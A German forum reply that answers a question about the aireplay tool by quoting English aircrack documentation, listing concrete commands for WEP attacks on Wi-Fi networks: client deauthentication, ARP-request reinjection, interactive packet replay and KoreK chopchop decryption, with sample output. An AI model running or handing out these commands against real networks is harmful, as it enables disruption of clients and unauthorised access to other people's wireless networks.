Zitat Zitat von MasterDennis
kann jemand mal den Aireplay Befehl erläutern und mal ein paar Beispiele der Funktionen darleben wäre nett...


mfg Dennis
http://repat.re.ohost.de/aircrack.html


z.b:

ARP-Anfragen mit einer Prism2 Karte generieren

airmon.sh start wlan0
airodump wlan0 out 6 (zu einer anderen Konsole wechseln)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0


English hilft : D

#

This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:

aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is either 68 or 86 bytes (depending on the operating system):

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

# Attack 3: ARP-request reinjection

The classic ARP-request replay attack is the most effective to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

Please note that you can also reuse ARP requests from a previous capture using the -r switch.

aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

# Attacke 4: KoreK's "chopchop" (CRC prediction)

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet.